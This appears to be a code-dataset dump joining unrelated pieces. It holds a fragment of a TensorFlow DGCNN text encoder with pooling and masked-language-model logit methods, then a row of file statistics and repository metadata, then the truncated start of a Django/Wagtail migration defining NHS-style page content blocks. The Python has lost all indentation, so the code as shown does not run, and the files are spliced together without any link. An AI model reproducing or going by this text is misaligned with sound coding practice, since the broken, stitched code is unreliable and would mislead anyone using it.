seq_mask = tf.cast(mask, tf.float32)
max_avg = tf.reduce_max(qanet_layers.mask_logits(self.sequence_output, seq_mask), axis=1)
pooled_output.append(max_avg)
tf.logging.info("***** max pooling *****")
self.output = tf.concat(pooled_output, axis=-1)
tf.logging.info("***** seq-encoder *****")
elif kargs.get("cnn_type", 'textcnn') == 'dgcnn':
input_shape = bert_utils.get_shape_list(sent_repres, expected_rank=3)
hidden_size = self.config['cnn_num_filters'][0]
input_width = input_shape[-1]
# if input_width != hidden_size:
# sent_repres = tf.layers.dense(
# sent_repres,
# hidden_size,
# use_bias=None,
# activation=None,
# kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
# tf.logging.info("==apply embedding linear projection==")
self.sequence_output = dgcnn_utils.dgcnn(
sent_repres,
input_mask,
num_layers=self.config['cnn_num_layers'],
dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
strides=self.config.get('cnn_dilation_rates', [1,1]),
num_filters=self.config.get('cnn_num_filters', [128,128]),
kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
is_training=is_training,
scope_name="textcnn",
reuse=False,
activation=tf.nn.relu,
is_casual=self.config['is_casual'],
padding=self.config.get('padding', 'same')
)
print(self.sequence_output.get_shape(), '=====sequence_output shape=====')
print(mask.get_shape(), "===mask shape===")
pooled_output = []
for pooling_method in self.config['pooling_method']:
if pooling_method == 'avg':
seq_mask = tf.cast(mask, tf.float32)
print(tf.reduce_sum(seq_mask, axis=1).get_shape(), "==avg seq shape")
avg_repres = tf.reduce_sum(self.sequence_output*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
pooled_output.append(avg_repres)
tf.logging.info("***** avg pooling *****")
elif pooling_method == 'max':
seq_mask = tf.cast(mask, tf.float32)
max_avg = tf.reduce_max(qanet_layers.mask_logits(self.sequence_output, seq_mask), axis=1)
pooled_output.append(max_avg)
tf.logging.info("***** max pooling *****")
elif pooling_method == "last":
last = esim_utils.last_relevant_output(self.sequence_output, input_len)
pooled_output.append(last)
tf.logging.info("***** last pooling *****")
self.output = tf.concat(pooled_output, axis=-1)
tf.logging.info("***** seq-encoder *****")
elif kargs.get("cnn_type", 'textcnn') == 'bi_dgcnn':
self.sequence_output = dgcnn_utils.dgcnn(
sent_repres,
input_mask,
num_layers=self.config['cnn_num_layers'],
dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
strides=self.config.get('cnn_dilation_rates', [1,1]),
num_filters=self.config.get('cnn_num_filters', [128,128]),
kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
is_training=is_training,
scope_name="textcnn/forward",
reuse=False,
activation=tf.nn.relu,
is_casual=self.config['is_casual'],
padding=self.config.get('padding', 'same')
)
self.sequence_output_backward = dgcnn_utils.backward_dgcnn(
sent_repres,
input_mask,
num_layers=self.config['cnn_num_layers'],
dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
strides=self.config.get('cnn_dilation_rates', [1,1]),
num_filters=self.config.get('cnn_num_filters', [128,128]),
kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
is_training=is_training,
scope_name="textcnn/backward",
reuse=False,
activation=tf.nn.relu,
is_casual=self.config['is_casual'],
padding=self.config.get('padding', 'same')
)
pooled_output = []
if self.config.get('is_casual', True):
self.forward_backward_repres = tf.concat([self.sequence_output[:,:-2],
self.sequence_output_backward[:,2:]],
axis=-1)
seq_mask = tf.cast(input_mask[:, 2:], dtype=tf.int32)
tf.logging.info("***** casual concat *****")
else:
self.forward_backward_repres = tf.concat([self.sequence_output,
self.sequence_output_backward],
axis=-1)
tf.logging.info("***** none-casual concat *****")
seq_mask = tf.cast(input_mask, dtype=tf.int32)
# for pooling_method in self.config['pooling_method']:
# if pooling_method == 'avg':
# seq_mask = tf.cast(mask[:, 1:-1, :], tf.float32)
# print(tf.reduce_sum(seq_mask, axis=1).get_shape(), "==avg seq shape")
# avg_repres = tf.reduce_sum(self.forward_backward_repres*seq_mask, axis=1)/(1e-10+tf.reduce_sum(seq_mask, axis=1))
# pooled_output.append(avg_repres)
# tf.logging.info("***** avg pooling *****")
# elif pooling_method == 'max':
# seq_mask = tf.cast(mask[:, 1:-1, :], tf.float32)
# max_avg = tf.reduce_max(qanet_layers.mask_logits(self.forward_backward_repres, seq_mask), axis=1)
# pooled_output.append(max_avg)
# tf.logging.info("***** max pooling *****")
# elif pooling_method == "last":
# last = esim_utils.last_relevant_output(self.forward_backward_repres, input_len-2)
# pooled_output.append(last)
# tf.logging.info("***** last pooling *****")
input_mask = tf.cast(input_mask, tf.float32)
for pooling_method in self.config['pooling_method']:
if pooling_method == 'avg':
avg_repres = dgcnn_utils.mean_pooling(self.forward_backward_repres,
seq_mask)
pooled_output.append(avg_repres)
tf.logging.info("***** avg pooling *****")
elif pooling_method == 'max':
max_repres = dgcnn_utils.max_pooling(self.forward_backward_repres,
seq_mask)
pooled_output.append(max_repres)
tf.logging.info("***** max pooling *****")
elif pooling_method == 'last':
last_repres = dgcnn_utils.last_pooling(self.forward_backward_repres,
seq_mask)
pooled_output.append(last_repres)
tf.logging.info("***** last pooling *****")
elif pooling_method == 'multidim_atten':
multidim_repres = dgcnn_utils.multidim_attention_pooling(
self.forward_backward_repres,
seq_mask,
is_training,
scope=None)
pooled_output.append(multidim_repres)
tf.logging.info("***** multidim_atten pooling *****")
self.output = tf.concat(pooled_output, axis=-1)
elif kargs.get("cnn_type", 'textcnn') == 'bi_light_dgcnn':
self.sequence_output = light_conv_utils.dgcnn(
sent_repres,
input_mask,
num_layers=self.config['cnn_num_layers'],
dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
strides=self.config.get('cnn_dilation_rates', [1,1]),
num_filters=self.config.get('cnn_num_filters', [128,128]),
kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
is_training=is_training,
scope_name="textcnn/forward",
reuse=False,
activation=tf.nn.relu,
is_casual=self.config['is_casual'],
padding=self.config.get('padding', 'same')
)
self.sequence_output_backward = light_conv_utils.backward_dgcnn(
sent_repres,
input_mask,
num_layers=self.config['cnn_num_layers'],
dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
strides=self.config.get('cnn_dilation_rates', [1,1]),
num_filters=self.config.get('cnn_num_filters', [128,128]),
kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
is_training=is_training,
scope_name="textcnn/backward",
reuse=False,
activation=tf.nn.relu,
is_casual=self.config['is_casual'],
padding=self.config.get('padding', 'same')
)
pooled_output = []
if self.config.get('is_casual', True):
self.forward_backward_repres = tf.concat([self.sequence_output[:,:-2],
self.sequence_output_backward[:,2:]],
axis=-1)
seq_mask = tf.cast(input_mask[:, 2:], dtype=tf.int32)
tf.logging.info("***** casual concat *****")
else:
self.forward_backward_repres = tf.concat([self.sequence_output,
self.sequence_output_backward],
axis=-1)
tf.logging.info("***** none-casual concat *****")
seq_mask = tf.cast(input_mask, dtype=tf.int32)
input_mask = tf.cast(input_mask, tf.float32)
for pooling_method in self.config['pooling_method']:
if pooling_method == 'avg':
avg_repres = dgcnn_utils.mean_pooling(self.forward_backward_repres,
seq_mask)
pooled_output.append(avg_repres)
tf.logging.info("***** avg pooling *****")
elif pooling_method == 'max':
max_repres = dgcnn_utils.max_pooling(self.forward_backward_repres,
seq_mask)
pooled_output.append(max_repres)
tf.logging.info("***** max pooling *****")
elif pooling_method == 'last':
last_repres = dgcnn_utils.last_pooling(self.forward_backward_repres,
seq_mask)
pooled_output.append(last_repres)
tf.logging.info("***** last pooling *****")
elif pooling_method == 'multidim_atten':
multidim_repres = dgcnn_utils.multidim_attention_pooling(
self.forward_backward_repres,
seq_mask,
is_training,
scope=None)
pooled_output.append(multidim_repres)
tf.logging.info("***** multidim_atten pooling *****")
self.output = tf.concat(pooled_output, axis=-1)
elif kargs.get("cnn_type", 'textcnn') == 'light_dgcnn':
print("==cnn type==", kargs.get("cnn_type", 'textcnn'))
self.sequence_output = light_conv_utils.dgcnn(
sent_repres,
input_mask,
num_layers=self.config['cnn_num_layers'],
dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
strides=self.config.get('cnn_dilation_rates', [1,1]),
num_filters=self.config.get('cnn_num_filters', [128,128]),
kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
is_training=is_training,
scope_name="textcnn/forward",
reuse=False,
activation=tf.nn.relu,
is_casual=self.config['is_casual'],
padding=self.config.get('padding', 'same'),
layer_wise_pos=self.config.get('layer_wise_pos', False)
)
pooled_output = []
if self.config.get('is_casual', True):
self.forward_backward_repres = self.sequence_output[:,:-2]
seq_mask = tf.cast(input_mask[:, 2:], dtype=tf.int32)
tf.logging.info("***** casual concat *****")
else:
self.forward_backward_repres = self.sequence_output
tf.logging.info("***** none-casual concat *****")
seq_mask = tf.cast(input_mask, dtype=tf.int32)
input_mask = tf.cast(input_mask, tf.float32)
for pooling_method in self.config['pooling_method']:
if pooling_method == 'avg':
avg_repres = dgcnn_utils.mean_pooling(self.forward_backward_repres,
seq_mask)
pooled_output.append(avg_repres)
tf.logging.info("***** avg pooling *****")
elif pooling_method == 'max':
max_repres = dgcnn_utils.max_pooling(self.forward_backward_repres,
seq_mask)
pooled_output.append(max_repres)
tf.logging.info("***** max pooling *****")
elif pooling_method == 'last':
last_repres = dgcnn_utils.last_pooling(self.forward_backward_repres,
seq_mask)
pooled_output.append(last_repres)
tf.logging.info("***** last pooling *****")
elif pooling_method == 'multidim_atten':
multidim_repres = dgcnn_utils.multidim_attention_pooling(
self.forward_backward_repres,
seq_mask,
is_training,
scope=None)
pooled_output.append(multidim_repres)
tf.logging.info("***** multidim_atten pooling *****")
self.output = tf.concat(pooled_output, axis=-1)
# elif kargs.get("cnn_type", 'textcnn') == 'dynamic_light_dgcnn':
# self.sequence_output = dynamic_dgcnn(
# sent_repres,
# input_mask,
# num_attention_heads=self.config.get('num_attention_heads', 1),
# size_per_head=self.config.get('size_per_head', 64),
# query_act=None,
# key_act=None,
# value_act=None,
# attention_probs_dropout_prob=self.config.get('attention_probs_dropout_prob', 0.2),
# initializer_range=0.02,
# do_return_2d_tensor=False,
# batch_size=None,
# from_seq_length=None,
# attention_fixed_size=None,
# dropout_name=None,
# structural_attentions="none",
# scale_ratio=self.config.get('scale_ratio', 1.0),
# num_layers=self.config['cnn_num_layers'],
# dilation_rates=self.config.get('cnn_dilation_rates', [1,2]),
# strides=self.config.get('cnn_dilation_rates', [1,1]),
# num_filters=self.config.get('cnn_num_filters', [128,128]),
# kernel_sizes=self.config.get('cnn_filter_sizes', [3,3]),
# is_training=is_training,
# scope_name="textcnn/forward",
# reuse=tf.AUTO_REUSE,
# activation=tf.nn.relu,
# is_casual=self.config['is_casual'],
# padding=self.config.get('padding', 'same'),
# layer_wise_pos=self.config.get('layer_wise_pos', False)
# )
# pooled_output = []
# if self.config.get('is_casual', True):
# self.forward_backward_repres = self.sequence_output[:,:-2]
# seq_mask = tf.cast(input_mask[:, 2:], dtype=tf.int32)
# tf.logging.info("***** casual concat *****")
# else:
# self.forward_backward_repres = self.sequence_output
# tf.logging.info("***** none-casual concat *****")
# seq_mask = tf.cast(input_mask, dtype=tf.int32)
# input_mask = tf.cast(input_mask, tf.float32)
# for pooling_method in self.config['pooling_method']:
# if pooling_method == 'avg':
# avg_repres = dgcnn_utils.mean_pooling(self.forward_backward_repres,
# seq_mask)
# pooled_output.append(avg_repres)
# tf.logging.info("***** avg pooling *****")
# elif pooling_method == 'max':
# max_repres = dgcnn_utils.max_pooling(self.forward_backward_repres,
# seq_mask)
# pooled_output.append(max_repres)
# tf.logging.info("***** max pooling *****")
# elif pooling_method == 'last':
# last_repres = dgcnn_utils.last_pooling(self.forward_backward_repres,
# seq_mask)
# pooled_output.append(last_repres)
# tf.logging.info("***** last pooling *****")
# elif pooling_method == 'multidim_atten':
# multidim_repres = dgcnn_utils.multidim_attention_pooling(
# self.forward_backward_repres,
# seq_mask,
# is_training,
# scope=None)
# pooled_output.append(multidim_repres)
# tf.logging.info("***** multidim_atten pooling *****")
# self.output = tf.concat(pooled_output, axis=-1)
else:
self.sequence_output = None
self.output = textcnn_utils.text_cnn_v1(sent_repres,
self.config.get("filter_size", [1,3,5]),
"textcnn",
sent_repres.get_shape()[-1],
self.config.num_filters,
max_pool_size=self.config.max_pool_size,
input_mask=input_mask)
tf.logging.info("***** normal cnn *****")
print("output shape====", self.output.get_shape())
def build_output_logits(self, **kargs):
input_tensor = self.sequence_output
input_shape_list = bert_utils.get_shape_list(self.sequence_output, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
embedding_projection = kargs.get('embedding_projection', None)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(scope))
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
projection_width = self.config.emb_size
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(self.config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
self.config.initializer_range))
output_bias = tf.get_variable(
"output_bias",
shape=[self.config.vocab_size],
initializer=tf.zeros_initializer())
# batch x seq x embedding
logits = tf.einsum("abc,dc->abd", input_tensor, self.emb_mat)
self.logits = tf.nn.bias_add(logits, output_bias)
def build_other_output_logits(self, sequence_output, **kargs):
input_tensor = sequence_output
input_shape_list = bert_utils.get_shape_list(sequence_output, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
embedding_projection = kargs.get('embedding_projection', None)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(scope))
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
projection_width = self.config.emb_size
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(self.config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
self.config.initializer_range))
output_bias = tf.get_variable(
"output_bias",
shape=[self.config.vocab_size],
initializer=tf.zeros_initializer())
# batch x seq x embedding
logits = tf.einsum("abc,dc->abd", input_tensor, self.emb_mat)
logits = tf.nn.bias_add(logits, output_bias)
return logits
def build_backward_output_logits(self, **kargs):
input_tensor = self.sequence_output_backward
input_shape_list = bert_utils.get_shape_list(self.sequence_output_backward, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
embedding_projection = kargs.get('embedding_projection', None)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(scope))
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
projection_width = self.config.emb_size
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(self.config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
self.config.initializer_range))
output_bias = tf.get_variable(
"output_bias",
shape=[self.config.vocab_size],
initializer=tf.zeros_initializer())
# batch x seq x embedding
logits = tf.einsum("abc,dc->abd", input_tensor, self.emb_mat)
self.backward_logits = tf.nn.bias_add(logits, output_bias)
def get_pooled_output(self, **kargs):
return self.output
def put_task_output(self, input_repres, **kargs):
self.task_repres = input_repres
def get_task_output(self, **kargs):
return self.task_repres
def get_sequence_output(self, **kargs):
return self.sequence_output
def get_embedding_table(self, **kargs):
return self.emb_mat
def get_embedding_projection_table(self, **kargs):
return None
def get_sequence_output_logits(self, **kargs):
return self.logits
def get_sequence_backward_output_logits(self, **kargs):
return self.backward_logits
| 42.057692 | 121 | 0.652281 | 3,662 | 28,431 | 4.773894 | 0.05953 | 0.06807 | 0.038668 | 0.025626 | 0.861629 | 0.843382 | 0.83463 | 0.822618 | 0.818327 | 0.801339 | 0 | 0.011596 | 0.208364 | 28,431 | 675 | 122 | 42.12 | 0.76514 | 0.14646 | 0 | 0.780952 | 0 | 0 | 0.132045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024762 | false | 0 | 0.024762 | 0.013333 | 0.066667 | 0.015238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d66b56d17013793ba1c7cba1a09d7d5317ada56e | 62,733 | py | Python | app/modules/core/migrations/0001_initial.py | nickmoreton/nhsx-website | 2397d1308376c02b75323d30e6bc916af0daac9d | [
"MIT"
] | 50 | 2019-04-04T17:50:00.000Z | 2021-08-05T15:08:37.000Z | app/modules/core/migrations/0001_initial.py | nickmoreton/nhsx-website | 2397d1308376c02b75323d30e6bc916af0daac9d | [
"MIT"
] | 434 | 2019-04-04T18:25:32.000Z | 2022-03-31T18:23:37.000Z | app/modules/core/migrations/0001_initial.py | nhsx-mirror/nhsx-website | 2133b4e275ca35ff77f7d6874e809f139ec4bf86 | [
"MIT"
] | 23 | 2019-04-04T09:52:07.000Z | 2021-04-11T07:41:47.000Z | # Generated by Django 3.0.4 on 2020-04-01 13:46
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wagtailnhsukfrontend.blocks
class Migration(migrations.Migration):
initial = True
dependencies = [
("wagtailcore", "0045_assign_unlock_grouppagepermission"),
]
operations = [
migrations.CreateModel(
name="ArticlePage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"body",
wagtail.core.fields.StreamField(
[
(
"image_block",
wagtail.core.blocks.StructBlock(
[
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
required=True
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
help_text="Only leave this blank if the image is decorative.",
required=False,
),
),
(
"caption",
wagtail.core.blocks.CharBlock(
required=False
),
),
]
),
),
(
"panel_block",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"promo_block",
wagtail.core.blocks.StructBlock(
[
(
"url",
wagtail.core.blocks.URLBlock(
label="URL", required=True
),
),
(
"heading",
wagtail.core.blocks.CharBlock(
required=True
),
),
(
"description",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
label="Image", required=False
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("", "Default"),
("small", "Small"),
],
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
]
),
),
(
"expander_block",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
required=True
),
),
(
"body",
wagtail.core.blocks.StreamBlock(
[
(
"richtext",
wagtail.core.blocks.RichTextBlock(),
),
(
"action_link",
wagtail.core.blocks.StructBlock(
[
(
"text",
wagtail.core.blocks.CharBlock(
label="Link text",
required=True,
),
),
(
"external_url",
wagtail.core.blocks.URLBlock(
label="URL",
required=True,
),
),
(
"new_window",
wagtail.core.blocks.BooleanBlock(
label="Open in new window",
required=False,
),
),
]
),
),
(
"inset_text",
wagtail.core.blocks.StructBlock(
[
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
)
]
),
),
(
"image",
wagtail.core.blocks.StructBlock(
[
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
required=True
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
help_text="Only leave this blank if the image is decorative.",
required=False,
),
),
(
"caption",
wagtail.core.blocks.CharBlock(
required=False
),
),
]
),
),
(
"grey_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
label="heading",
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"warning_callout",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
default="Important",
required=True,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
required=True,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"summary_list",
wagtail.core.blocks.StructBlock(
[
(
"rows",
wagtail.core.blocks.ListBlock(
wagtailnhsukfrontend.blocks.SummaryListRowBlock
),
),
(
"no_border",
wagtail.core.blocks.BooleanBlock(
default=False,
required=False,
),
),
]
),
),
],
required=True,
),
),
]
),
),
(
"grey_panel_block",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
label="heading", required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"inset_text_block",
wagtail.core.blocks.StructBlock(
[
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
)
]
),
),
(
"panel_list_block",
wagtail.core.blocks.StructBlock(
[
(
"panels",
wagtail.core.blocks.ListBlock(
wagtail.core.blocks.StructBlock(
[
(
"left_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"right_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
]
)
),
)
]
),
),
(
"promo_group_block",
wagtail.core.blocks.StructBlock(
[
(
"column",
wagtail.core.blocks.ChoiceBlock(
choices=[
("one-half", "One-half"),
("one-third", "One-third"),
]
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("", "Default"),
("small", "Small"),
],
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"promos",
wagtail.core.blocks.ListBlock(
wagtailnhsukfrontend.blocks.BasePromoBlock
),
),
]
),
),
(
"warning_callout_block",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
default="Important", required=True
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
required=True,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
],
blank=True,
verbose_name="Body blocks",
),
),
],
options={"abstract": False,},
bases=("wagtailcore.page",),
),
migrations.CreateModel(
name="SectionPage",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"body",
wagtail.core.fields.StreamField(
[
(
"image_block",
wagtail.core.blocks.StructBlock(
[
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
required=True
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
help_text="Only leave this blank if the image is decorative.",
required=False,
),
),
(
"caption",
wagtail.core.blocks.CharBlock(
required=False
),
),
]
),
),
(
"panel_block",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"promo_block",
wagtail.core.blocks.StructBlock(
[
(
"url",
wagtail.core.blocks.URLBlock(
label="URL", required=True
),
),
(
"heading",
wagtail.core.blocks.CharBlock(
required=True
),
),
(
"description",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
label="Image", required=False
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("", "Default"),
("small", "Small"),
],
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
]
),
),
(
"expander_block",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
required=True
),
),
(
"body",
wagtail.core.blocks.StreamBlock(
[
(
"richtext",
wagtail.core.blocks.RichTextBlock(),
),
(
"action_link",
wagtail.core.blocks.StructBlock(
[
(
"text",
wagtail.core.blocks.CharBlock(
label="Link text",
required=True,
),
),
(
"external_url",
wagtail.core.blocks.URLBlock(
label="URL",
required=True,
),
),
(
"new_window",
wagtail.core.blocks.BooleanBlock(
label="Open in new window",
required=False,
),
),
]
),
),
(
"inset_text",
wagtail.core.blocks.StructBlock(
[
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
)
]
),
),
(
"image",
wagtail.core.blocks.StructBlock(
[
(
"content_image",
wagtail.images.blocks.ImageChooserBlock(
required=True
),
),
(
"alt_text",
wagtail.core.blocks.CharBlock(
help_text="Only leave this blank if the image is decorative.",
required=False,
),
),
(
"caption",
wagtail.core.blocks.CharBlock(
required=False
),
),
]
),
),
(
"grey_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
label="heading",
required=False,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"warning_callout",
wagtail.core.blocks.StructBlock(
[
(
"title",
wagtail.core.blocks.CharBlock(
default="Important",
required=True,
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
required=True,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"summary_list",
wagtail.core.blocks.StructBlock(
[
(
"rows",
wagtail.core.blocks.ListBlock(
wagtailnhsukfrontend.blocks.SummaryListRowBlock
),
),
(
"no_border",
wagtail.core.blocks.BooleanBlock(
default=False,
required=False,
),
),
]
),
),
],
required=True,
),
),
]
),
),
(
"grey_panel_block",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
label="heading", required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"inset_text_block",
wagtail.core.blocks.StructBlock(
[
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
)
]
),
),
(
"panel_list_block",
wagtail.core.blocks.StructBlock(
[
(
"panels",
wagtail.core.blocks.ListBlock(
wagtail.core.blocks.StructBlock(
[
(
"left_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
(
"right_panel",
wagtail.core.blocks.StructBlock(
[
(
"label",
wagtail.core.blocks.CharBlock(
required=False
),
),
(
"heading_level",
wagtail.core.blocks.IntegerBlock(
default=3,
help_text="The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.",
max_value=4,
min_value=2,
),
),
(
"body",
wagtail.core.blocks.RichTextBlock(
required=True
),
),
]
),
),
]
)
),
)
]
),
),
(
"promo_group_block",
wagtail.core.blocks.StructBlock(
[
(
"column",
